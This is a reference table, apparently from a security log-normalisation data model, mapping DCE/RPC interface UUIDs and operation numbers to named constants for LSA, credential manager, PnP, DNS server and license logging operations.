12345778-1234-abcd-ef00-0123456789ab:21 XDM_CONST.DCERPC_OPERATION_LSAR_GET_QUOTAS_FOR_ACCOUNT

12345778-1234-abcd-ef00-0123456789ab:22 XDM_CONST.DCERPC_OPERATION_LSAR_SET_QUOTAS_FOR_ACCOUNT

12345778-1234-abcd-ef00-0123456789ab:23 XDM_CONST.DCERPC_OPERATION_LSAR_GET_SYSTEM_ACCESS_ACCOUNT

12345778-1234-abcd-ef00-0123456789ab:24 XDM_CONST.DCERPC_OPERATION_LSAR_SET_SYSTEM_ACCESS_ACCOUNT

12345778-1234-abcd-ef00-0123456789ab:25 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_TRUSTED_DOMAIN

12345778-1234-abcd-ef00-0123456789ab:26 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_INFO_TRUSTED_DOMAIN

12345778-1234-abcd-ef00-0123456789ab:27 XDM_CONST.DCERPC_OPERATION_LSAR_SET_INFORMATION_TRUSTED_DOMAIN

12345778-1234-abcd-ef00-0123456789ab:28 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_SECRET

12345778-1234-abcd-ef00-0123456789ab:29 XDM_CONST.DCERPC_OPERATION_LSAR_SET_SECRET
 Original Mapped Description

12345778-1234-abcd-ef00-0123456789ab:30 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_SECRET

12345778-1234-abcd-ef00-0123456789ab:31 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_PRIVILEGE_VALUE

12345778-1234-abcd-ef00-0123456789ab:32 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_PRIVILEGE_NAME

12345778-1234-abcd-ef00-0123456789ab:33 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_PRIVILEGE_DISPLAY_NAME

12345778-1234-abcd-ef00-0123456789ab:34 XDM_CONST.DCERPC_OPERATION_LSAR_DELETE_OBJECT

12345778-1234-abcd-ef00-0123456789ab:35 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_ACCOUNTS_WITH_USER_RIGHT

12345778-1234-abcd-ef00-0123456789ab:36 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_ACCOUNT_RIGHTS

12345778-1234-abcd-ef00-0123456789ab:37 XDM_CONST.DCERPC_OPERATION_LSAR_ADD_ACCOUNT_RIGHTS

12345778-1234-abcd-ef00-0123456789ab:38 XDM_CONST.DCERPC_OPERATION_LSAR_REMOVE_ACCOUNT_RIGHTS

12345778-1234-abcd-ef00-0123456789ab:39 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_TRUSTED_DOMAIN_INFO

12345778-1234-abcd-ef00-0123456789ab:40 XDM_CONST.DCERPC_OPERATION_LSAR_SET_TRUSTED_DOMAIN_INFO

12345778-1234-abcd-ef00-0123456789ab:41 XDM_CONST.DCERPC_OPERATION_LSAR_DELETE_TRUSTED_DOMAIN

12345778-1234-abcd-ef00-0123456789ab:42 XDM_CONST.DCERPC_OPERATION_LSAR_STORE_PRIVATE_DATA

12345778-1234-abcd-ef00-0123456789ab:43 XDM_CONST.DCERPC_OPERATION_LSAR_RETRIEVE_PRIVATE_DATA

12345778-1234-abcd-ef00-0123456789ab:44 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_POLICY2

12345778-1234-abcd-ef00-0123456789ab:45 XDM_CONST.DCERPC_OPERATION_LSAR_GET_USER_NAME

12345778-1234-abcd-ef00-0123456789ab:46 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_INFORMATION_POLICY2

12345778-1234-abcd-ef00-0123456789ab:47 XDM_CONST.DCERPC_OPERATION_LSAR_SET_INFORMATION_POLICY2

12345778-1234-abcd-ef00-0123456789ab:48 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_TRUSTED_DOMAIN_INFO_BY_NAME

12345778-1234-abcd-ef00-0123456789ab:49 XDM_CONST.DCERPC_OPERATION_LSAR_SET_TRUSTED_DOMAIN_INFO_BY_NAME

12345778-1234-abcd-ef00-0123456789ab:50 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_TRUSTED_DOMAINS_EX

12345778-1234-abcd-ef00-0123456789ab:51 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_TRUSTED_DOMAIN_EX

12345778-1234-abcd-ef00-0123456789ab:52 XDM_CONST.DCERPC_OPERATION_LSAR_CLOSE_TRUSTED_DOMAIN_EX

12345778-1234-abcd-ef00-0123456789ab:53 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_DOMAIN_INFORMATION_POLICY

12345778-1234-abcd-ef00-0123456789ab:54 XDM_CONST.DCERPC_OPERATION_LSAR_SET_DOMAIN_INFORMATION_POLICY

12345778-1234-abcd-ef00-0123456789ab:55 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_TRUSTED_DOMAIN_BY_NAME

12345778-1234-abcd-ef00-0123456789ab:56 XDM_CONST.DCERPC_OPERATION_LSAR_TEST_CALL

12345778-1234-abcd-ef00-0123456789ab:57 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_SIDS2

12345778-1234-abcd-ef00-0123456789ab:58 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_NAMES2

12345778-1234-abcd-ef00-0123456789ab:59 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_TRUSTED_DOMAIN_EX2

12345778-1234-abcd-ef00-0123456789ab:60 XDM_CONST.DCERPC_OPERATION_CREDR_WRITE

12345778-1234-abcd-ef00-0123456789ab:61 XDM_CONST.DCERPC_OPERATION_CREDR_READ

12345778-1234-abcd-ef00-0123456789ab:62 XDM_CONST.DCERPC_OPERATION_CREDR_ENUMERATE

12345778-1234-abcd-ef00-0123456789ab:63 XDM_CONST.DCERPC_OPERATION_CREDR_WRITE_DOMAIN_CREDENTIALS

12345778-1234-abcd-ef00-0123456789ab:64 XDM_CONST.DCERPC_OPERATION_CREDR_READ_DOMAIN_CREDENTIALS

12345778-1234-abcd-ef00-0123456789ab:65 XDM_CONST.DCERPC_OPERATION_CREDR_DELETE

12345778-1234-abcd-ef00-0123456789ab:66 XDM_CONST.DCERPC_OPERATION_CREDR_GET_TARGET_INFO

12345778-1234-abcd-ef00-0123456789ab:67 XDM_CONST.DCERPC_OPERATION_CREDR_PROFILE_LOADED

12345778-1234-abcd-ef00-0123456789ab:68 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_NAMES3

12345778-1234-abcd-ef00-0123456789ab:69 XDM_CONST.DCERPC_OPERATION_CREDR_GET_SESSION_TYPES

12345778-1234-abcd-ef00-0123456789ab:70 XDM_CONST.DCERPC_OPERATION_LSAR_REGISTER_AUDIT_EVENT
 Original Mapped Description

12345778-1234-abcd-ef00-0123456789ab:71 XDM_CONST.DCERPC_OPERATION_LSAR_GEN_AUDIT_EVENT

12345778-1234-abcd-ef00-0123456789ab:72 XDM_CONST.DCERPC_OPERATION_LSAR_UNREGISTER_AUDIT_EVENT

12345778-1234-abcd-ef00-0123456789ab:73 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_FOREST_TRUST_INFORMATION

12345778-1234-abcd-ef00-0123456789ab:74 XDM_CONST.DCERPC_OPERATION_LSAR_SET_FOREST_TRUST_INFORMATION

12345778-1234-abcd-ef00-0123456789ab:75 XDM_CONST.DCERPC_OPERATION_CREDR_RENAME

12345778-1234-abcd-ef00-0123456789ab:76 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_SIDS3

12345778-1234-abcd-ef00-0123456789ab:77 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_NAMES4

12345778-1234-abcd-ef00-0123456789ab:78 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_POLICY_SCE

12345778-1234-abcd-ef00-0123456789ab:79 XDM_CONST.DCERPC_OPERATION_LSAR_ADT_REGISTER_SECURITY_EVENT_SOURCE

12345778-1234-abcd-ef00-0123456789ab:80 XDM_CONST.DCERPC_OPERATION_LSAR_ADT_UNREGISTER_SECURITY_EVENT_SOURCE

12345778-1234-abcd-ef00-0123456789ab:81 XDM_CONST.DCERPC_OPERATION_LSAR_ADT_REPORT_SECURITY_EVENT

12345778-1234-abcd-ef00-0123456789ab:82 XDM_CONST.DCERPC_OPERATION_CREDR_FIND_BEST_CREDENTIAL

12345778-1234-abcd-ef00-0123456789ab:83 XDM_CONST.DCERPC_OPERATION_LSAR_SET_AUDIT_POLICY

12345778-1234-abcd-ef00-0123456789ab:84 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_AUDIT_POLICY

12345778-1234-abcd-ef00-0123456789ab:85 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_AUDIT_POLICY

12345778-1234-abcd-ef00-0123456789ab:86 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_AUDIT_CATEGORIES

12345778-1234-abcd-ef00-0123456789ab:87 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_AUDIT_SUB_CATEGORIES

12345778-1234-abcd-ef00-0123456789ab:88 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_AUDIT_CATEGORY_NAME

12345778-1234-abcd-ef00-0123456789ab:89 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_AUDIT_SUB_CATEGORY_NAME

12345778-1234-abcd-ef00-0123456789ab:90 XDM_CONST.DCERPC_OPERATION_LSAR_SET_AUDIT_SECURITY

12345778-1234-abcd-ef00-0123456789ab:91 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_AUDIT_SECURITY

12345778-1234-abcd-ef00-0123456789ab:92 XDM_CONST.DCERPC_OPERATION_CRED_READ_BY_TOKEN_HANDLE

12345778-1234-abcd-ef00-0123456789ab:93 XDM_CONST.DCERPC_OPERATION_CREDR_RESTORE_CREDENTIALS

12345778-1234-abcd-ef00-0123456789ab:94 XDM_CONST.DCERPC_OPERATION_CREDR_BACKUP_CREDENTIALS

17fdd703-1827-4e34-79d4-24a55c53bb37:0 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_NAME_ADD

17fdd703-1827-4e34-79d4-24a55c53bb37:1 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_NAME_ENUM

17fdd703-1827-4e34-79d4-24a55c53bb37:2 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_NAME_GET_INFO

17fdd703-1827-4e34-79d4-24a55c53bb37:3 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_NAME_DEL

5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc:0 XDM_CONST.DCERPC_OPERATION_NETR_SEND_MESSAGE

8d9f4e40-a03d-11ce-8f69-08003e30051b:0 XDM_CONST.DCERPC_OPERATION_PNP_DISCONNECT

8d9f4e40-a03d-11ce-8f69-08003e30051b:1 XDM_CONST.DCERPC_OPERATION_PNP_CONNECT

8d9f4e40-a03d-11ce-8f69-08003e30051b:2 XDM_CONST.DCERPC_OPERATION_PNP_GET_VERSION

8d9f4e40-a03d-11ce-8f69-08003e30051b:3 XDM_CONST.DCERPC_OPERATION_PNP_GET_GLOBAL_STATE

8d9f4e40-a03d-11ce-8f69-08003e30051b:4 XDM_CONST.DCERPC_OPERATION_PNP_INIT_DETECTION

8d9f4e40-a03d-11ce-8f69-08003e30051b:5 XDM_CONST.DCERPC_OPERATION_PNP_REPORT_LOG_ON

8d9f4e40-a03d-11ce-8f69-08003e30051b:6 XDM_CONST.DCERPC_OPERATION_PNP_VALIDATE_DEVICE_INSTANCE

8d9f4e40-a03d-11ce-8f69-08003e30051b:7 XDM_CONST.DCERPC_OPERATION_PNP_GET_ROOT_DEVICE_INSTANCE

8d9f4e40-a03d-11ce-8f69-08003e30051b:8 XDM_CONST.DCERPC_OPERATION_PNP_GET_RELATED_DEVICE_INSTANCE

8d9f4e40-a03d-11ce-8f69-08003e30051b:9 XDM_CONST.DCERPC_OPERATION_PNP_ENUMERATE_SUB_KEYS

8d9f4e40-a03d-11ce-8f69-08003e30051b:10 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEVICE_LIST

8d9f4e40-a03d-11ce-8f69-08003e30051b:11 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEVICE_LIST_SIZE
 Original Mapped Description

8d9f4e40-a03d-11ce-8f69-08003e30051b:12 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEPTH

8d9f4e40-a03d-11ce-8f69-08003e30051b:13 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEVICE_REG_PROP

8d9f4e40-a03d-11ce-8f69-08003e30051b:14 XDM_CONST.DCERPC_OPERATION_PNP_SET_DEVICE_REG_PROP

8d9f4e40-a03d-11ce-8f69-08003e30051b:15 XDM_CONST.DCERPC_OPERATION_PNP_GET_CLASS_INSTANCE

8d9f4e40-a03d-11ce-8f69-08003e30051b:16 XDM_CONST.DCERPC_OPERATION_PNP_CREATE_KEY

8d9f4e40-a03d-11ce-8f69-08003e30051b:17 XDM_CONST.DCERPC_OPERATION_PNP_DELETE_REGISTRY_KEY

8d9f4e40-a03d-11ce-8f69-08003e30051b:18 XDM_CONST.DCERPC_OPERATION_PNP_GET_CLASS_COUNT

8d9f4e40-a03d-11ce-8f69-08003e30051b:19 XDM_CONST.DCERPC_OPERATION_PNP_GET_CLASS_NAME

8d9f4e40-a03d-11ce-8f69-08003e30051b:20 XDM_CONST.DCERPC_OPERATION_PNP_DELETE_CLASS_KEY

8d9f4e40-a03d-11ce-8f69-08003e30051b:21 XDM_CONST.DCERPC_OPERATION_PNP_GET_INTERFACE_DEVICE_ALIAS

8d9f4e40-a03d-11ce-8f69-08003e30051b:22 XDM_CONST.DCERPC_OPERATION_PNP_GET_INTERFACE_DEVICE_LIST

8d9f4e40-a03d-11ce-8f69-08003e30051b:23 XDM_CONST.DCERPC_OPERATION_PNP_GET_INTERFACE_DEVICE_LIST_SIZE

8d9f4e40-a03d-11ce-8f69-08003e30051b:24 XDM_CONST.DCERPC_OPERATION_PNP_REGISTER_DEVICE_CLASS_ASSOCIATION

8d9f4e40-a03d-11ce-8f69-08003e30051b:25 XDM_CONST.DCERPC_OPERATION_PNP_UNREGISTER_DEVICE_CLASS_ASSOCIATION

8d9f4e40-a03d-11ce-8f69-08003e30051b:26 XDM_CONST.DCERPC_OPERATION_PNP_GET_CLASS_REG_PROP

8d9f4e40-a03d-11ce-8f69-08003e30051b:27 XDM_CONST.DCERPC_OPERATION_PNP_SET_CLASS_REG_PROP

8d9f4e40-a03d-11ce-8f69-08003e30051b:28 XDM_CONST.DCERPC_OPERATION_PNP_CREATE_DEV_INST

8d9f4e40-a03d-11ce-8f69-08003e30051b:29 XDM_CONST.DCERPC_OPERATION_PNP_DEVICE_INSTANCE_ACTION

8d9f4e40-a03d-11ce-8f69-08003e30051b:30 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEVICE_STATUS

8d9f4e40-a03d-11ce-8f69-08003e30051b:31 XDM_CONST.DCERPC_OPERATION_PNP_SET_DEVICE_PROBLEM

8d9f4e40-a03d-11ce-8f69-08003e30051b:32 XDM_CONST.DCERPC_OPERATION_PNP_DISABLE_DEV_INST

8d9f4e40-a03d-11ce-8f69-08003e30051b:33 XDM_CONST.DCERPC_OPERATION_PNP_UNINSTALL_DEV_INST

8d9f4e40-a03d-11ce-8f69-08003e30051b:34 XDM_CONST.DCERPC_OPERATION_PNP_ADD_ID

8d9f4e40-a03d-11ce-8f69-08003e30051b:35 XDM_CONST.DCERPC_OPERATION_PNP_REGISTER_DRIVER

8d9f4e40-a03d-11ce-8f69-08003e30051b:36 XDM_CONST.DCERPC_OPERATION_PNP_QUERY_REMOVE

8d9f4e40-a03d-11ce-8f69-08003e30051b:37 XDM_CONST.DCERPC_OPERATION_PNP_REQUEST_DEVICE_EJECT

8d9f4e40-a03d-11ce-8f69-08003e30051b:38 XDM_CONST.DCERPC_OPERATION_PNP_IS_DOCK_STATION_PRESENT

8d9f4e40-a03d-11ce-8f69-08003e30051b:39 XDM_CONST.DCERPC_OPERATION_PNP_REQUEST_EJECT_PC

8d9f4e40-a03d-11ce-8f69-08003e30051b:40 XDM_CONST.DCERPC_OPERATION_PNP_HW_PROF_FLAGS

8d9f4e40-a03d-11ce-8f69-08003e30051b:41 XDM_CONST.DCERPC_OPERATION_PNP_GET_HW_PROF_INFO

8d9f4e40-a03d-11ce-8f69-08003e30051b:42 XDM_CONST.DCERPC_OPERATION_PNP_ADD_EMPTY_LOG_CONF

8d9f4e40-a03d-11ce-8f69-08003e30051b:43 XDM_CONST.DCERPC_OPERATION_PNP_FREE_LOG_CONF

8d9f4e40-a03d-11ce-8f69-08003e30051b:44 XDM_CONST.DCERPC_OPERATION_PNP_GET_FIRST_LOG_CONF

8d9f4e40-a03d-11ce-8f69-08003e30051b:45 XDM_CONST.DCERPC_OPERATION_PNP_GET_NEXT_LOG_CONF

8d9f4e40-a03d-11ce-8f69-08003e30051b:46 XDM_CONST.DCERPC_OPERATION_PNP_GET_LOG_CONF_PRIORITY

8d9f4e40-a03d-11ce-8f69-08003e30051b:47 XDM_CONST.DCERPC_OPERATION_PNP_ADD_RES_DES

8d9f4e40-a03d-11ce-8f69-08003e30051b:48 XDM_CONST.DCERPC_OPERATION_PNP_FREE_RES_DES

8d9f4e40-a03d-11ce-8f69-08003e30051b:49 XDM_CONST.DCERPC_OPERATION_PNP_GET_NEXT_RES_DES

8d9f4e40-a03d-11ce-8f69-08003e30051b:50 XDM_CONST.DCERPC_OPERATION_PNP_GET_RES_DES_DATA

8d9f4e40-a03d-11ce-8f69-08003e30051b:51 XDM_CONST.DCERPC_OPERATION_PNP_GET_RES_DES_DATA_SIZE

8d9f4e40-a03d-11ce-8f69-08003e30051b:52 XDM_CONST.DCERPC_OPERATION_PNP_MODIFY_RES_DES
 Original Mapped Description

8d9f4e40-a03d-11ce-8f69-08003e30051b:53 XDM_CONST.DCERPC_OPERATION_PNP_DETECT_RESOURCE_CONFLICT

8d9f4e40-a03d-11ce-8f69-08003e30051b:54 XDM_CONST.DCERPC_OPERATION_PNP_QUERY_RES_CONF_LIST

8d9f4e40-a03d-11ce-8f69-08003e30051b:55 XDM_CONST.DCERPC_OPERATION_PNP_SET_HW_PROF

8d9f4e40-a03d-11ce-8f69-08003e30051b:56 XDM_CONST.DCERPC_OPERATION_PNP_QUERY_ARBITRATOR_FREE_DATA

8d9f4e40-a03d-11ce-8f69-08003e30051b:57 XDM_CONST.DCERPC_OPERATION_PNP_QUERY_ARBITRATOR_FREE_SIZE

8d9f4e40-a03d-11ce-8f69-08003e30051b:58 XDM_CONST.DCERPC_OPERATION_PNP_RUN_DETECTION

8d9f4e40-a03d-11ce-8f69-08003e30051b:59 XDM_CONST.DCERPC_OPERATION_PNP_REGISTER_NOTIFICATION

8d9f4e40-a03d-11ce-8f69-08003e30051b:60 XDM_CONST.DCERPC_OPERATION_PNP_UNREGISTER_NOTIFICATION

8d9f4e40-a03d-11ce-8f69-08003e30051b:61 XDM_CONST.DCERPC_OPERATION_PNP_GET_CUSTOM_DEV_PROP

8d9f4e40-a03d-11ce-8f69-08003e30051b:62 XDM_CONST.DCERPC_OPERATION_PNP_GET_VERSION_INTERNAL

8d9f4e40-a03d-11ce-8f69-08003e30051b:63 XDM_CONST.DCERPC_OPERATION_PNP_GET_BLOCKED_DRIVER_INFO

8d9f4e40-a03d-11ce-8f69-08003e30051b:64 XDM_CONST.DCERPC_OPERATION_PNP_GET_SERVER_SIDE_DEVICE_INSTALL_FLAGS

8d9f4e40-a03d-11ce-8f69-08003e30051b:65 XDM_CONST.DCERPC_OPERATION_PNP_GET_OBJECT_PROP_KEYS

8d9f4e40-a03d-11ce-8f69-08003e30051b:66 XDM_CONST.DCERPC_OPERATION_PNP_GET_OBJECT_PROP

8d9f4e40-a03d-11ce-8f69-08003e30051b:67 XDM_CONST.DCERPC_OPERATION_PNP_SET_OBJECT_PROP

8d9f4e40-a03d-11ce-8f69-08003e30051b:68 XDM_CONST.DCERPC_OPERATION_PNP_INSTALL_DEV_INST

8d9f4e40-a03d-11ce-8f69-08003e30051b:69 XDM_CONST.DCERPC_OPERATION_PNP_APPLY_POWER_SETTINGS

8d9f4e40-a03d-11ce-8f69-08003e30051b:70 XDM_CONST.DCERPC_OPERATION_PNP_DRIVER_STORE_ADD_DRIVER_PACKAGE

8d9f4e40-a03d-11ce-8f69-08003e30051b:71 XDM_CONST.DCERPC_OPERATION_PNP_DRIVER_STORE_DELETE_DRIVER_PACKAGE

8d9f4e40-a03d-11ce-8f69-08003e30051b:72 XDM_CONST.DCERPC_OPERATION_PNP_REGISTER_SERVICE_NOTIFICATION

8d9f4e40-a03d-11ce-8f69-08003e30051b:73 XDM_CONST.DCERPC_OPERATION_PNP_SET_ACTIVE_SERVICE

8d9f4e40-a03d-11ce-8f69-08003e30051b:74 XDM_CONST.DCERPC_OPERATION_PNP_DELETE_SERVICE_DEVICES

50abc2a4-574d-40b3-9d66-ee4fd5fba076:0 XDM_CONST.DCERPC_OPERATION_DNSSRV_OPERATION

50abc2a4-574d-40b3-9d66-ee4fd5fba076:1 XDM_CONST.DCERPC_OPERATION_DNSSRV_QUERY

50abc2a4-574d-40b3-9d66-ee4fd5fba076:2 XDM_CONST.DCERPC_OPERATION_DNSSRV_COMPLEX_OPERATION

50abc2a4-574d-40b3-9d66-ee4fd5fba076:3 XDM_CONST.DCERPC_OPERATION_DNSSRV_ENUM_RECORDS

50abc2a4-574d-40b3-9d66-ee4fd5fba076:4 XDM_CONST.DCERPC_OPERATION_DNSSRV_UPDATE_RECORD

50abc2a4-574d-40b3-9d66-ee4fd5fba076:5 XDM_CONST.DCERPC_OPERATION_DNSSRV_OPERATION2

50abc2a4-574d-40b3-9d66-ee4fd5fba076:6 XDM_CONST.DCERPC_OPERATION_DNSSRV_QUERY2

50abc2a4-574d-40b3-9d66-ee4fd5fba076:7 XDM_CONST.DCERPC_OPERATION_DNSSRV_COMPLEX_OPERATION2

50abc2a4-574d-40b3-9d66-ee4fd5fba076:8 XDM_CONST.DCERPC_OPERATION_DNSSRV_ENUM_RECORDS2

50abc2a4-574d-40b3-9d66-ee4fd5fba076:9 XDM_CONST.DCERPC_OPERATION_DNSSRV_UPDATE_RECORD2

57674cd0-5200-11ce-a897-08002b2e9c6d:0 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_REQUEST_W

57674cd0-5200-11ce-a897-08002b2e9c6d:1 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_FREE

342cfd40-3c6c-11ce-a893-08002b2e9c6d:0 XDM_CONST.DCERPC_OPERATION_LLSR_CONNECT

342cfd40-3c6c-11ce-a893-08002b2e9c6d:1 XDM_CONST.DCERPC_OPERATION_LLSR_CLOSE

342cfd40-3c6c-11ce-a893-08002b2e9c6d:2 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:3 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:4 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:5 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_ADD_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:6 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_ENUM_W
 Original Mapped Description

342cfd40-3c6c-11ce-a893-08002b2e9c6d:7 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:8 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:9 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_ADD_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:10 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_USER_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:11 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_USER_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:12 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SERVER_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:13 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SERVER_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:14 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_LICENSE_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:15 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_LICENSE_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:16 XDM_CONST.DCERPC_OPERATION_LLSR_USER_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:17 XDM_CONST.DCERPC_OPERATION_LLSR_USER_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:18 XDM_CONST.DCERPC_OPERATION_LLSR_USER_INFO_GET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:19 XDM_CONST.DCERPC_OPERATION_LLSR_USER_INFO_GET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:20 XDM_CONST.DCERPC_OPERATION_LLSR_USER_INFO_SET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:21 XDM_CONST.DCERPC_OPERATION_LLSR_USER_INFO_SET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:22 XDM_CONST.DCERPC_OPERATION_LLSR_USER_DELETE_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:23 XDM_CONST.DCERPC_OPERATION_LLSR_USER_DELETE_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:24 XDM_CONST.DCERPC_OPERATION_LLSR_USER_PRODUCT_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:25 XDM_CONST.DCERPC_OPERATION_LLSR_USER_PRODUCT_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:26 XDM_CONST.DCERPC_OPERATION_LLSR_USER_PRODUCT_DELETE_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:27 XDM_CONST.DCERPC_OPERATION_LLSR_USER_PRODUCT_DELETE_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:28 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:29 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:30 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_INFO_GET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:31 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_INFO_GET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:32 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_INFO_SET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:33 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_INFO_SET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:34 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:35 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:36 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:37 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_ADD_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:38 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_DELETE_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:39 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_DELETE_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:40 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:41 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_ADD_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:42 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_DELETE_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:43 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_DELETE_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:44 XDM_CONST.DCERPC_OPERATION_LLSR_SERVER_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:45 XDM_CONST.DCERPC_OPERATION_LLSR_SERVER_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:46 XDM_CONST.DCERPC_OPERATION_LLSR_SERVER_PRODUCT_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:47 XDM_CONST.DCERPC_OPERATION_LLSR_SERVER_PRODUCT_ENUM_A
 Original Mapped Description

342cfd40-3c6c-11ce-a893-08002b2e9c6d:48 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:49 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:50 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_INFO_GET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:51 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_INFO_GET_A

